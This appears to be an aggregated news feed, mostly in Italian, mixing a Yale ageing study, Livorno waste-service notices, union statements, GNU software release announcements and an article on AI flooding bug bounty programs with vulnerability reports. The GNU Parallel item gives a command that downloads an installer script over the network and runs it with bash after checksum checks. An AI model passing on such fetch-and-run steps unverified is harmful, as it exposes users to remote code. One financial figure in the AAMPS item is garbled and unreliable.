L’autrice dello studio, Becca R. Levy, docente di scienze sociali e comportamentali, ha analizzato i dati di uno studio decennale sugli anziani americani a livello nazionale. La scoperta all’interno del dipartimento di salute della Yale School è che la metà degli adulti di età pari o sopra i 65 anni ha mostrato un miglioramento cognitivo ma anche fisico nel tempo.
In tarda età, molte fatiche della vita come il lavorare, portare pesi e altro vengono limitate. Si tende a faticare meno o a disincentivare il lavoro più pesante. Mente e fisico sicuramente devono affrontare primi problemi di salute. Però, non è una costante e molti anziani, che hanno più tempo libero, possono usufruirne per migliorarsi e migliorare anche le condizioni fisiche.
L’analisi di Becca Levy non ha scoperto miglioramenti in piccoli gruppi eccezionali ma in soggetti collegati o accomunati da diversi fattori importanti. Tra questi, anche il non vedere l’invecchiamento per forza come un ostacolo o un decadimento. I risultati sono stati pubblicati sulla rivista Geriatrics e contengono diverse informazioni.
L’Health and Retirement Study è l’indagine longitudinale sugli anziani americani, finanziata a livello federale. Coinvolse 11.000 partecipanti ed è lo studio utilizzato per trarre i dati sulla nuova filosofia dell’invecchiamento. I cambiamenti cognitivi furono valutati considerando funzionalità fisiche come camminata veloce e altre attività. In un follow-up di 12 anni, il 45% dei partecipanti ha registrato miglioramenti in due ambiti di vita. Il 32% ha registrato miglioramenti cognitivi, il 28% miglioramenti fisici.
Queste percentuali non dicono che non ci siano deterioramenti fisici e cognitivi, come dice lo studio stesso: “Se si fa la media di tutti, si nota un declino. Ma quando si considerano le traiettorie individuali, si scopre una storia molto diversa. Una percentuale significativa dei partecipanti più anziani che abbiamo studiato è migliorata“.
Uno studio di Yale scopre cambiamenti positivi negli adulti dai 65 anni in su è stato pubblicato per la prima volta su Lega Nerd. L’utilizzo dei testi contenuti su Lega Nerd è soggetto alla licenza Creative Commons Attribuzione-Non commerciale-Non opere derivate 2.5 Italia License. Altri articoli dello stesso autore: Daniela Giannace
Scavando nei meandri dei nostri archivi abbiamo ripescato questa fantastica produzione di ZeroCalcare per sostenere A/I. Ve la rigiriamo a distanza di più di 20 anni, ricordandovi che potete sostenerci in tanti modi, compreso il 5×1000!
PS: rimanete sintonizzati perché all’hackmeeting tornano… LE MAGLIETTE (e le spillette pure, clamoroso!)!
A test release of GNUtrition, 0.33.0rc4, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release improves how user ages are stored and used by GNUtrition. You no longer need to manually update your age every year on (or near) your birthday. Thankfully, no database changes/migrations are necessary for this, you just need to enter your birthday and you will be good to go!
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

Ratificando un utile di 252.000 € l’Assemblea dei Soci di AAMPS ha approvato nei giorni scorsi il bilancio aziendale 2025. Un risultato in linea con quanto registrato negli anni precedenti, comprendendo anche quelli relativi all’uscita anticipata dal concordato preventivo in continuità, con i bilanci che avevano ottenuto analoghi risultati (965.202€ nel 2019, 2.2912.441€ nel 2020, 515.035€ nel 2021, 94.835€ nel 2022, 131.270€ nel 2023 e 145.704 € nel 2024).
La notizia era stata anticipata nei giorni scorsi durante una conferenza stampa dedicata ai bilanci di tutte le aziende partecipate del Comune di Livorno, ma il Sindaco di Livorno Luca Salvetti, affiancato dall’Amministratore Unico Aldo Iacomelli e dalle assessore Viola Ferroni e Giovanna Cepparello, ha tenuto ad aprire un faro su AAMPS/Retiambiente.
“Sono orgoglioso di questa azienda, dei servizi che eroga e di tutti i suoi lavoratori. Nel 2019 abbiamo trovato AAMPS in concordato preventivo, con un futuro a dir poco incerto e il rischio concreto di vederla soccombere sotto il peso di conti sballati e servizi alla cittadinanza inadeguati. Ora registriamo l’ennesimo bilancio in utile consecutivo, con il personale incrementato e stabilizzato e prospettive di consolidamento e sviluppo prima impensabili. In tale percorso siamo riusciti a traghettarla in RetiAmbiente consolidandone la vocazione industriale e riuscendo a contenere la TARI senza aumentarla per cinque anni e allineandola agli importi degli altri capoluoghi di provincia della Toscana. Sono i fatti che ci permettono di respingere al mittente le accuse sollevate recentemente da alcuni esponenti dell’opposizione in consiglio comunale ammantate di macroscopiche inesattezze e castronerie indecifrabili sia riconducibili all’azienda sia alla sua holding”.
“AAMPS ha fatto un incontrovertibile cambio di passo tornando ad essere un’azienda in salute con un ruolo di primo piano sia nell’erogazione dei servizi alla cittadinanza sia tra le società operative locali dell’Ato Toscana Costa che compongono la galassia Retiambiente e dove l’azienda riveste un ruolo di primo piano assoluto. Il cammino è stato impervio con ostacoli che sembravano insormontabili. Oggi siamo invece nella possibilità di guardare al futuro con grande ottimismo e rinnovate prospettive di consolidamento sia sul versante economico-finanziario sia su quello dello sviluppo industriale”.
“I numeri sono dalla nostra parte e ci dicono che AAMPS può cogliere risultati importanti inerenti la vocazione ambientale che è chiamata a rappresentare ed esprimere. Nonostante mesi di particolare difficoltà, dovuti a contingenze operative affrontate con impegno e sacrificio da parte di tutti, oggi l’azienda può guardare in avanti con rinnovato entusiasmo e approssimarsi ad innovare e introdurre importanti cambiamenti nella gestione dei rifiuti a livello locale in linea con le strategie condivise con le altre SOL del gruppo Retiambiente. Chiederemo ai cittadini la consueta collaborazione con l’obiettivo di aumentare le percentuali di raccolta differenziata, conferendo materiali di maggiore qualità, e allo stesso tempo continuare a diminuire la produzione dei rifiuti nelle rispettive abitazioni”.
AAMPS è un fiore all’occhiello di Livorno. Una società interamente pubblica che eroga servizi ambientali a favore della città fin dal 1949 con grande efficacia ed efficienza impegnando 421 lavoratori in moto perpetuo nella raccolta dei rifiuti, nella pulizia delle strade e nei servizi cimiteriali e commerciali. Tutto questo con i conti sotto controllo suffragati anche dall’assenza di debiti e avendo comunque effettuato importanti investimenti, attingendo a finanziamenti dedicati, senza fare ricorso al credito bancario. Il tutto nella massima trasparenza richiesta ad una società in house providing in affiancamento alla sua holding con la quale condividere strategie industriali ben ponderate”.
L'articolo AAMPS/Retiambiente: ancora un bilancio in utile proviene da Aamps Livorno.
In vista della festività di martedì 2 giugno AAMPS/Retiambiente conferma che il servizio di raccolta dei rifiuti si svolgerà regolarmente. Sono previsti solo alcuni cambiamenti negli itinerari di interesse per gli abitanti delle aree Livorno Est e Picchianti-Porta a Terra.
Ecco il dettaglio suddiviso per Aree valido per la raccolta nel giorno della Festa della Repubblica:
Area Livorno Nord
Indifferenziato: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Area Sant’Jacopo Marradi
Il calendario ordinario non prevede il servizio di raccolta il lunedì.
Area Vittoria Stazione Zola
Carta-cartone: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Area Livorno est
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Area Picchianti – Porta a Terra
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Area Ardenza – La Rosa
Organico: servizio attivo la mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta).
Livorno Sud
Carta-cartone: servizio attivo con esposizione del materiale dalle ore 21.00 di lunedì alle 5.00 del giorno di raccolta.
Pentagono
Multimateriale: servizio attivo con esposizione del materiale dalle ore 19.30 alle 20.00 del giorno di raccolta.
Aree Pentagono e Centro Allargato
Tutti i contenitori stradali presenti nelle aree “Pentagono” e “Centro Allargato” saranno regolarmente vuotati. Il Centro di raccolta “Livorno Sud” e il “Centro del riuso creativo” saranno chiusi martedì e riapriranno il giorno seguente. Servizio di raccolta pannolini/pannoloni: non effettuato nei giorni festivi.
Ringraziamo i cittadini per la consueta collaborazione. Per ulteriori informazioni: 800-031.266, info@aamps.livorno.it, facebook/instagram/APP (“AAMPS Livorno”).
L'articolo Rifiuti: quali servizi nella festività del 2 giugno proviene da Aamps Livorno.
L’Unione Sindacale di Base aderisce e partecipa alla manifestazione “No Base” del 2 giugno a Pontedera, una mobilitazione necessaria contro la militarizzazione dei territori, contro l’economia di guerra e contro le politiche imperialiste portate avanti dal governo italiano, dall’Unione Europea e dagli Stati Uniti.
Da anni USB è impegnata nelle lotte contro la guerra, contro il riarmo e contro l’utilizzo dei porti, delle infrastrutture logistiche e dei territori come strumenti della macchina bellica. Lo abbiamo fatto organizzando scioperi, presidi e mobilitazioni nei porti italiani contro il traffico di armi e contro il coinvolgimento dell’Italia nei conflitti imperialisti.
Abbiamo sostenuto e promosso mobilitazioni internazionali dei lavoratori portuali contro il traffico di armi e contro il genocidio del popolo palestinese, ribadendo che i porti non devono essere al servizio della guerra e della morte.
Oggi più che mai è evidente il legame tra militarizzazione dell’economia, attacco ai diritti sociali e peggioramento delle condizioni materiali delle lavoratrici e dei lavoratori. Mentre miliardi vengono destinati alle spese militari, ai programmi di riarmo e alla Nato, salari, pensioni, sanità, scuola e servizi pubblici vengono sacrificati sull’altare della guerra e del profitto.
Per questo diciamo con forza:
GIÙ LE ARMI, SU I SALARI
La costruzione di nuove basi militari, l’espansione delle servitù militari e la subordinazione dei territori agli interessi strategici della Nato rappresentano un attacco diretto alle esigenze sociali delle classi popolari. Le lavoratrici e i lavoratori non possono pagare il prezzo della guerra, del carovita e delle politiche imperialiste.
USB denuncia il genocidio in Palestina e la complicità del governo italiano, dell’Unione Europea e degli Stati Uniti nel sostegno politico, economico e militare a Israele. Allo stesso tempo respingiamo le aggressioni economiche, politiche e militari contro i popoli che resistono all’ordine imperialista, dall’attacco permanente contro Cuba e Venezuela e l’attacco all’Iran.
La guerra esterna si accompagna sempre alla guerra interna contro il lavoro, contro il conflitto sociale e contro il diritto di sciopero. La militarizzazione produce repressione, precarietà e impoverimento, mentre grandi gruppi industriali e finanziari aumentano i propri profitti grazie all’economia di guerra.
Per queste ragioni saremo in piazza il 2 giugno a Pontedera insieme ai movimenti territoriali, alle realtà sociali e a tutte e tutti coloro che si oppongono alla guerra, all’imperialismo e alla militarizzazione dei territori.
NO ALLA BASE MILITARE
NO ALL’ECONOMIA DI GUERRA
NO ALL’IMPERIALISMO
STOP AL GENOCIDIO IN PALESTINA
GIÙ LE ARMI, SU I SALARI

A test release of GNUtrition, 0.33.0rc3, is now available.
GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release removes a number of dependencies that broke building/installing on various systems. You no longer need to have a full LibreOffice, ncurses, SQLite, or LaTeX/TexInfo install to build and install GNUtrition.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).

A leggere il nuovo “2026 Cloud Security Report” realizzato da Check Point insieme a Cybersecurity Insiders, sembra proprio che l’adozione dell’intelligenza artificiale nelle aziende stia crescendo più rapidamente della capacità delle organizzazioni di proteggerla. Il report, basato sulle risposte di 1.042 professionisti IT e cybersecurity provenienti da organizzazioni di tutto il mondo, mostra un quadro […]
L'articolo Il 78% delle aziende ha già subito o sospetta incidenti legati all’IA proviene da Securityinfo.it.


Immagine in evidenza rielaborata con intelligenza artificiale (ChatGPT)
L’applicazione dell’intelligenza artificiale nella cybersicurezza genera, da sempre, sentimenti contrastanti. Le potenzialità dell’AI rappresentano, da una parte, un’opportunità per migliorare il livello di automazione nelle attività di rilevamento e risposta agli attacchi dei criminali informatici. L’altra faccia della medaglia è rappresentata dalla possibilità che gli stessi cybercriminali ne sfruttino le capacità per aumentare l’efficacia degli attacchi.
È qualcosa che sta già accadendo e che viene messo nero su bianco, per esempio, nel Global Threat Report 2026 di CrowdStrike. Stando ai dati pubblicati dalla società di cybersecurity, gli attacchi portati utilizzando l’AI sarebbero aumentati dell’89% anno su anno.
Ma l’impatto dell’AI non si esaurisce negli attacchi veri e propri. La stessa tecnologia che li accelera sta mettendo sotto pressione, in particolare, l’ecosistema che fino a oggi ha garantito l’attività di identificazione e analisi delle vulnerabilità software. In altre parole, l’AI sta rompendo gli equilibri che per anni hanno permesso di mitigare il rischio di attacchi informatici.
Per comprendere l’impatto dell’AI in questo particolarissimo settore è indispensabile comprenderne i meccanismi. La vulnerability discovery è infatti una macchina complicata, in cui si intrecciano interessi diversi e convivono varie contraddizioni.
Il concetto alla base del sistema è quello di individuare eventuali falle di sicurezza di software e sistemi operativi prima che questi vengano scovati dai cyber criminali. Un’attività che vede impegnate centinaia (migliaia) di aziende e ricercatori indipendenti, spesso all’interno dei cosiddetti programmi di bug bounty, cioè processi controllati attraverso i quali gli sviluppatori ricompensano economicamente chi segnala una nuova vulnerabilità potenzialmente pericolosa, permettendo loro di correggerla attraverso patch di aggiornamento.
L’importanza del fattore tempo emerge proprio nella fase finale del processo di responsible disclosure, quando vengono rilasciati l’aggiornamento e i dettagli della vulnerabilità. È in questo momento che si apre una finestra temporale particolarmente delicata: quella in cui un cybercriminale può sfruttare la vulnerabilità creando un exploit (la tecnica che permette di portare un attacco) in grado di “bucare” i sistemi non aggiornati.
Fino a oggi, il tempo necessario per realizzare il codice che sfrutta una falla di sicurezza per portare un attacco era, nella maggior parte dei casi, di settimane o al massimo di qualche giorno. Un margine sufficiente perché gli aggiornamenti venissero distribuiti. Di conseguenza, il rischio che qualcuno rimanesse “scoperto” era relativamente basso.
A causa degli strumenti basati su intelligenza artificiale generativa, però, le cose sono cambiate. Utilizzando l’AI è possibile realizzare un exploit con una velocità prima impensabile. Secondo i ricercatori di sicurezza Efi Weiss e Nahman Khayet, autori di un progetto dedicato, per creare un exploit con l’AI partendo da una vulnerabilità nota sarebbero sufficienti anche solo 15 minuti.
Lo scorso 7 aprile, un comunicato ufficiale di Anthropic ha scosso il settore della cybersecurity. Oggetto dell’annuncio era il nuovo large language model Claude Mythos Preview, che gli sviluppatori dell’azienda californiana hanno sostanzialmente classificato come uno strumento troppo pericoloso per essere distribuito pubblicamente. Il motivo? Il nuovo LLM sarebbe in grado di individuare vulnerabilità all’interno dei software con un’efficacia senza precedenti. Rilasciarlo pubblicamente, di conseguenza, sarebbe troppo rischioso.
L’azienda ha quindi deciso di avviare un progetto, battezzato con il nome di Project Glasswing, che coinvolge un numero limitato di soggetti come Microsoft, Apple, Google, AWS, Cisco, Nvidia e Linux Foundation. Qualche controindicazione, però, è emersa quasi subito. Lo stesso giorno dell’annuncio, il 7 aprile, un gruppo riunito in un forum Discord privato è riuscito ad accedere a Mythos — non con un attacco sofisticato, ma combinando le credenziali del dipendente di un fornitore terzo con un’ipotesi azzeccata sull’URL del modello. La vicenda è emersa pubblicamente circa due settimane dopo, grazie a un’inchiesta di Bloomberg. Considerato che Mythos era stato tratteggiato come una sorta di “arma fine di mondo”, con accesso soggetto a strettissime restrizioni, non si tratta proprio di un esordio rassicurante.
Al netto del sensazionalismo dell’annuncio, che secondo molti rappresenta un marchio di fabbrica del marketing di Anthropic, la vicenda di Claude Mythos Preview si inserisce in un fenomeno più ampio, che gli esperti di sicurezza informatica stanno segnalando da tempo come estremamente problematico: la crescita esponenziale del numero di vulnerabilità segnalate.
In sintesi, il problema non è tanto la possibilità che i gruppi dediti al cyber crimine riescano a sfruttare gli LLM avanzati per individuare nuove vulnerabilità zero-day (falle di sicurezza ancora sconosciute), quanto il fatto che l’implementazione di strumenti automatizzati per l’analisi dei software sta generando troppe segnalazioni rispetto a quelle che gli sviluppatori sono in grado di gestire.
Una cosa, infatti, è individuare una falla. Un’altra è correggere il codice per eliminare il rischio che la vulnerabilità venga sfruttata per portare un attacco. Qualsiasi aggiornamento di un software o – a maggior ragione – di un sistema operativo richiede infatti una serie di verifiche e test per validarne l’efficacia e, non ultimo, escludere eventuali conflitti o “effetti collaterali” indesiderati nel suo funzionamento. Insomma: rimediare a una vulnerabilità richiede più impegno e più tempo rispetto a sfruttarla per scopi malevoli.
A livello intuitivo, si potrebbe pensare che questo squilibrio tra il numero di segnalazioni e la capacità di elaborarne il contenuto possa avere come conseguenza un semplice rallentamento delle operazioni. Non è così.
Per prassi consolidata, infatti, il processo di responsible disclosure prevede che al destinatario della segnalazione sia concesso un termine – solitamente di 60-90 giorni – entro il quale deve rilasciare l’aggiornamento. Trascorso il termine, chi ha inviato la segnalazione è autorizzato a rendere pubblici i dettagli della vulnerabilità.
Si tratta di un accorgimento che ha un duplice obiettivo. Il primo è quello di evitare che lo sviluppatore possa “snobbare” la segnalazione, anche solo per negare il meritato compenso del ricercatore che l’ha effettuata. La seconda è quella di ridurre il rischio che qualcun altro scopra la falla o che questa diventi pubblica per un qualsiasi motivo prima che l’aggiornamento sia disponibile.
Anche se piuttosto rari, in passato si sono verificati casi in cui gli sviluppatori non sono riusciti a rispettare la scadenza e si sono trovati di fronte a una pubblicazione dei dettagli di una vulnerabilità quando non avevano ancora preso le dovute contromisure. Nel nuovo scenario, in cui le segnalazioni piovono a una velocità impressionante, rispettare le scadenze rischia di diventare molto più difficile.
La cronaca recente conferma tutti i timori legati al massiccio impiego dell’AI nell’individuazione delle vulnerabilità. La società di cybersecurity HackerOne ha sospeso il suo programma Internet Bug Bounty (IBB), attività finanziata in crowdfunding che gestisce dal 2013. Il motivo? L’eccessivo numero di segnalazioni stava mettendo in difficoltà chi ha il compito di correggere il codice del software. E questo soprattutto in ambito open source, dove la gestione dei progetti è spesso affidata a programmatori che prestano la loro opera a titolo volontario.
La pagina web di HackerOne è un perfetto riassunto dei problemi che vive il settore. Nelle sue policy, spiega che ricompenserà solo quelle vulnerabilità che “siano state segnalate in modo responsabile, riconosciute, analizzate (triage), risolte e divulgate tramite un Security Advisory o una CVE (Common Vulnerabilities and Exposures, un sistema di catalogazione pubblico e standardizzato delle vulnerabilità di sicurezza informatica note – ndR). Se una vulnerabilità viene segnalata da più persone ed è riconosciuta all’interno del security advisory, solo il primo segnalatore (come identificato dai maintainer del progetto) avrà diritto alla ricompensa”.
In questo passaggio si leggono tutte le criticità legate a un ecosistema che è ormai andato fuori controllo. Traducendo dal “politically correct” adottato nelle policy, HackerOne ammette di trovarsi in una situazione in cui vengono segnalate vulnerabilità che non sono state sufficientemente approfondite, che in molti casi vengono scovate da più soggetti e per le quali non viene fornita una soluzione. Insomma: si trova ad avere a che fare con troppo “pattume” generato dall’AI. Motivazioni simili hanno indotto la piattaforma Bugcrowd a introdurre una serie di regole e restrizioni per contrastare il fenomeno che hanno battezzato come “sloptimism” (segnalazioni basate su AI inviate con troppa fiducia e poca verifica).
Guardando più nel dettaglio il fenomeno, emerge anche un altro dato. A gennaio 2026 i volontari che gestiscono cURL – software open source che gestisce lo scambio di dati con Internet e che, pur sconosciuto al grande pubblico, è installato in miliardi di dispositivi (telefoni, automobili, TV) – hanno annunciato che dal mese successivo avrebbero smesso di accettare segnalazioni tramite HackerOne. In un aggiornamento pubblicato ad aprile, il creatore Daniel Stenberg ha diffuso un grafico da cui emerge una tendenza abbastanza chiara: nonostante da febbraio non sia stata accettata alcuna segnalazione, il totale del 2026 era già arrivato a 87.
Al di là della crescita esponenziale di segnalazioni, spicca il fatto che nel 2025 sono stati registrati numerosi report classificati come “likely AI slop” (probabile pattume AI), cioè vulnerabilità di bassissimo impatto o inventate dall’intelligenza artificiale. Il loro numero, però, è diminuito percentualmente nel corso dell’anno successivo.
Prima di considerare questi dati come confortanti, è però opportuno considerare un altro aspetto: non tutte le vulnerabilità validate rappresentano un reale rischio di sicurezza. Come spiega Naz Bozdemir in un post sul blog di HackerOne, delle 22 vulnerabilità individuate da Claude Opus 4.6 nel codice di Mozilla Firefox – 14 delle quali ad alta gravità – soltanto due si sono rivelate effettivamente sfruttabili per costruire un exploit. In altre parole: erano tutte difetti reali, ma solo due rappresentavano un rischio imminente e concreto.
L’idea che una maggiore efficienza porti automaticamente a più sicurezza, alla fine, si sta rivelando un’illusione. L’uso intensivo dell’AI sta dimostrando esattamente il contrario: senza la capacità di selezionare, comprendere e intervenire, rischia di generare semplicemente caos.
L'articolo La fine del bug bounty? proviene da Guerre di Rete.
In occasione dell’80º anniversario della Repubblica italiana e del voto alle donne, ISTORECO, insieme ad ANPI, ANPPIA, ANED e al Cinema Teatro 4 Mori, invita la cittadinanza alla proiezione del film C’è ancora domani di Paola Cortellesi, che si terrà lunedì 1 giugno 2026 alle ore 21 presso il Cinema Teatro
4 Mori di Livorno con ingresso gratuito.
C’è ancora domani racconta, con forza e sensibilità, la condizione femminile nell’Italia del dopoguerra con una narrazione incentrata su una figura del popolo vessata in famiglia dall’atteggiamento arrogante e violento del marito e del suocero, due esemplari del peggiore, ed ancora attuale, patriarcato. Il marito non desidera che la moglie vada a votare e la protagonista si organizza per esercitare questo nuovo diritto. Prima tappa di un lungo cammino verso il riconoscimento dei diritti, da quello del voto, a quello della parità salariale per eguale lavoro, a quello dell’aborto, così come il diritto di ricoprire qualsiasi ruolo nell’ amministrazione dello Stato.
Riproporlo significa sollecitare una riflessione su quanto quella conquista abbia trasformato il Paese e su quanto ancora sia necessario impegnarsi per una piena ed egualitaria cittadinanza democratica.
La serata sarà introdotta dai saluti delle autorità e dal Presidente di ISTORECO, Claudio Massimo Seriacopi. Seguiranno un intervento di Catia Sonetti, Direttrice di ISTORECO, e della Prof.ssa Chiara Tognolotti, storica del cinema (Università di Pisa).
Fonte foto: Wikimedia Commons, https://upload.wikimedia.org/wikipedia/commons/3/3e/Panorama_porto_di_piombino.JPG?utm_source=it.wikipedia.org&utm_campaign=index&utm_content=original
Oggi la nostra città si è risvegliata con una bella notizia: le istituzioni di Piombino hanno formalmente cominciato a prendere posizione contro la crescita delle attività di carico e scarico di armi, mezzi militari ed altro materiale ad uso bellico nel nostro porto. La votazione favorevole del Consiglio Comunale di una mozione chiara e netta al riguardo (mozione presentata dai consiglieri di Rifondazione Comunista Fabrizio Callaioli e Dario Filippi, che ci teniamo a ringraziare) rappresenta senza dubbio un passo avanti, un passaggio figlio di un lungo percorso e che dovrà accompagnare una lotta che non è ovviamente finita.
Diverse realtà cittadine (tra cui anche il nostro sindacato e ovviamente il gruppo delle Donne in Nero) si sono lungamente spese perché la politica cittadina prendesse posizione e si attivasse concretamente contro il progressivo scivolare delle attività portuali verso l'ambito militare. Il voto di ieri dimostra che non è vero che lottare e protestare non serve a niente. Un comunicato, una manifestazione, un convegno, se isolati, spostano ben poco. Se uniti e capaci di durare nel tempo, possono invece riuscire a far pressione sulle istituzioni e a smuoverle. Una piccola ma utile lezione che pensiamo possa tornare utile anche rispetto a molti altri terreni di lotta.
Per parte nostra, consideriamo il voto di ieri anche un frutto positivo dell'aver lavorato affinché l'opposizione ai movimenti di armi nel porto non andasse separata da quella contro il rigassificatore, riuscendo a portare questa saldatura di lotte anche nella manifestazione cittadina dell'11 aprile scorso.
Né a Piombino né altrove
Le ragioni per opporsi al carico e scarico di armi (che siano per esercitazioni o che siano dirette verso veri e propri scenari di guerra, come nel caso della nave partita da Piombino lo scorso 30 marzo e diretta verso l'Arabia Saudita) indicate dalla mozione, sono lo stesse che come USB sosteniamo da tempo, sia a livello nazionale che in relazione al contesto di Piombino. Motivi etici e politici generali innanzitutto. Motivi di sicurezza per i lavoratori e la città, vista anche la vicina presenza del rigassificatore, (peraltro potenziale obiettivi sensibile in caso di guerra). Ma anche specificamente legati alla crisi economica e produttiva del nostro territorio. Non è un caso che l'Esercito Italiano e il Ministero della Difesa sembrino intenzionati a rendere Piombino un Hub militare. Un contesto sociale sofferente, segnato da disoccupazione e cassa integrazione si traduce in una popolazione più ricattabile e in un territorio sacrificabile, a cui si può propinare di tutto in cambio di una manciata anche piccola di posti di lavoro. E infatti dopo la discarica e dopo il rigassificatore abbiamo avuto anche la logistica della guerra. Così non si può andare avanti.
Per noi continua ad essere cruciale capire che o si interrompe questa spirale di ricatto e di declino, pretendendo dalla politica scelte opposte e coraggiose (come la nazionalizzazione delle acciaierie, ad esempio), o il prezzo da pagare sarà sempre più alto. E che solo una mobilitazione reale e sentita da parte di lavoratori e cittadini, con l'appoggio di forze sociali e politiche solidali e determinate può allontanare questa brutta prospettiva.
Dire No alla militarizzazione del porto di Piombino significa per noi tenere aperta la possibilità di un vero rilancio e potenziamento della sua funzione civile e commerciale, la sola che può garantire vere ricadute positive in termini di sviluppo economico e di posti di lavoro. Dire No alla logistica e all'economia della guerra significa cioè stare dalla parte di Piombino e del suo diritto al futuro.
Non ci illudiamo e invitiamo a non illudersi. Molto è ancora da fare per ostacolare e e interrompere il va e vieni di queste navi. Ma la mozione approvata ieri è un piccolo strumento in più a disposizione di chi vorrà tentare di farlo, sapendo che altrove questo è stato già possibile. Dimostrare con sempre maggiore incisività che Piombino rifiuta di diventare un Hub militare è la difficile sfida che abbiamo davanti, sfida a cui non ci sottrarremo.
USB Piombino

GNU Parallel 20260522 ('Hantavirus') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
...and GNU Parallel is fun.
-- DJviolin@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
Un altro operaio ucciso.
Un altro lavoratore che esce di casa e non ci torna più.
A Spianate, in provincia di Lucca, un operaio di 31 anni è morto schiacciato da una pressa dentro la ditta Cora Srl.
Non chiamatele morti bianche. Non chiamatele fatalità.
Non chiamatele tragiche coincidenze.
Questi sono omicidi sul lavoro.
Sono il prodotto di un sistema fondato sul profitto, sulla compressione dei costi, sulla riduzione della sicurezza a semplice variabile economica. In questo sistema i lavoratori vengono trattati come numeri, ingranaggi sostituibili, costi da abbattere per aumentare margini e produttività.
Ogni volta ci raccontano la stessa storia: si accerteranno le responsabilità, era un bravo lavoratore, si parla di “cordoglio”. Poi tutto continua come prima. Turni massacranti, appalti, precarietà, ritmi insostenibili, manutenzioni rimandate, formazione insufficiente, controlli inesistenti.
La verità è che queste morti vengono messe in conto.
Perché investire davvero in sicurezza costa.
E nel capitalismo italiano la vita di un operaio vale meno di un bilancio aziendale.
Mentre governo e padroni parlano di competitività e crescita, nei luoghi di lavoro si continua a morire. I profitti aumentano, i salari crollano, i diritti vengono smantellati e chi lavora paga con il sangue.
Noi diciamo basta.
Serve l’introduzione immediata del reato di OMICIDIO SUL LAVORO per imprenditori, dirigenti e responsabili che, violando norme e obblighi di sicurezza, causano la morte di lavoratrici e lavoratori.
Chi risparmia sulla sicurezza deve pagare penalmente.
Chi sfrutta deve rispondere delle proprie responsabilità.
Chi considera la vita operaia sacrificabile deve essere colpito duramente.
Non ci uniamo al coro dell’ipocrisia istituzionale.
